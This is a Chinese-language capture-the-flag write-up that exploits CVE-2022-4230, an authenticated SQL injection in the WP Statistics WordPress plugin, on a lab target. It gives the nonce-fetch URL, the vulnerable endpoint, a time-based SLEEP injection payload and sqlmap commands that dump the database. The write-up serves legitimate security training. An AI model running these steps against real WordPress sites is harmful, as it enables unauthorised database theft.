目錄

靶標(biāo)介紹

開(kāi)啟靶場(chǎng)

wpscan漏洞介紹

查詢數(shù)據(jù)庫(kù)表名

查詢表中字段名

查詢字段下數(shù)據(jù)

---

靶標(biāo)介紹

WP Statistics WordPress 插件13.2.9之前的版本不會(huì)轉(zhuǎn)義參數(shù)，這可能允許經(jīng)過(guò)身份驗(yàn)證的用戶執(zhí)行 SQL 注入攻擊。默認(rèn)情況下，具有管理選項(xiàng)功能 (admin+) 的用戶可以使用受影響的功能，但是該插件有一個(gè)設(shè)置允許低權(quán)限用戶也可以訪問(wèn)它。

開(kāi)啟靶場(chǎng)

開(kāi)啟靶場(chǎng)之后，發(fā)現(xiàn)什么都沒(méi)有，所以我們進(jìn)行目錄掃描，這里我使用的是御劍目錄掃描工具

訪問(wèn) license.txt 無(wú)收獲，訪問(wèn) resdme.html 發(fā)現(xiàn)以下頁(yè)面

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/readme.html

點(diǎn)擊 login page，發(fā)現(xiàn)了一個(gè)登錄頁(yè)面

試了用戶名和密碼是 admin 之后并無(wú)發(fā)現(xiàn)，左下角有一個(gè)“返回到 test”，說(shuō)明 test 大概率是用戶，嘗試登錄一下

發(fā)現(xiàn)登錄成功了

wpscan漏洞介紹

根據(jù)靶標(biāo)介紹，這里有插件漏洞，鏈接：WP Statistics < 13.2.9 – 經(jīng)過(guò)身份驗(yàn)證的 SQLi |CVE 2022-4230 |插件漏洞 (wpscan.com)，有興趣可以了解下

意思大概是這樣的：以允許查看WP統(tǒng)計(jì)信息的用戶身份登錄，并通過(guò)獲取隨機(jī)數(shù)“https://xxx.com/wp-admin/admin-ajax.php?action=rest-nonce”，并在下面的URL中使用它，該URL將延遲5s

首先通過(guò)訪問(wèn)，獲得隨機(jī)數(shù)（必須要先登錄過(guò)后臺(tái)才行）

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce

獲得隨機(jī)數(shù)之后，把隨機(jī)數(shù)添加到下面那個(gè) URL 中，訪問(wèn)一下試試，這里就不加“%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR”了，不加這條語(yǔ)句不影響最終結(jié)果

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=16139d290f&name=words&search_engine=aaa

訪問(wèn)之后發(fā)現(xiàn)了這個(gè)頁(yè)面，然后用 Burp 抓個(gè)包吧

把數(shù)據(jù)包復(fù)制到一個(gè)文本里，重命名為 test.txt 拖進(jìn) kali 桌面，在桌面打開(kāi)終端使用 sqlmap 工具跑一下

sqlmap -r test.txt --batch --dbs

發(fā)現(xiàn)了 wordpress 敏感數(shù)據(jù)庫(kù)

查詢數(shù)據(jù)庫(kù)表名

sqlmap -r test.txt --batch -D wordpress --tables

發(fā)現(xiàn)了一個(gè) flag 表

查詢表中字段名

sqlmap -r test.txt --batch -D wordpress -T flag --columns

發(fā)現(xiàn)字段名是 flag

查詢字段下數(shù)據(jù)

sqlmap -r test.txt --batch -D wordpress -T flag -C flag --dump

發(fā)現(xiàn)了 flag